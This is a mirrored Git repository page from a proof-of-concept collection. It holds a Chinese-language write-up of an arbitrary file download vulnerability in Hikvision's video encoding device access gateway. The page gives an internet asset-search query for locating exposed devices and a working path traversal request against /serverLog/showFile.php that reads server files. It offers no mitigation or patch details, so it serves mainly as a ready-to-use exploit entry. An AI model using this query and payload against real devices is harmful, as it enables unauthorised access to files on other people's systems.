admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-08 11:57:27 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/海康威视/海康威视视频编码设备接入网关/海康威视视频编码设备接入网关showFile.php任意文件下载漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.0 KiB
Raw Blame History

海康威视视频编码设备接入网关 showFile.php 任意文件下载漏洞

一、漏洞简介

海康威视视频接入网关系统在页面/serverLog/showFile.php的参数fileName存在任意文件下载漏洞

二、影响版本

  • HIKVISION 视频编码设备接入网关

三、资产测绘

  • hunterweb.title="视频编码设备接入网关"&&app.name=="Hikvision 海康威视视频编码设备接入网关"

1691857505004-d8663f3c-62e3-4cac-8909-21305e690fea.png

  • 登录页面

1691857519082-eb318732-d51e-4393-89a9-7296293727ba.png

四、漏洞复现

/serverLog/showFile.php?fileName=../web/html/main.php

1691857555317-62dd3fcc-287a-40ea-9cb0-6f4d7a94351e.png

更新: 2024-02-29 23:57:18
原文: https://www.yuque.com/xiaokp7/ocvun2/mq89stc9hxmf3fw1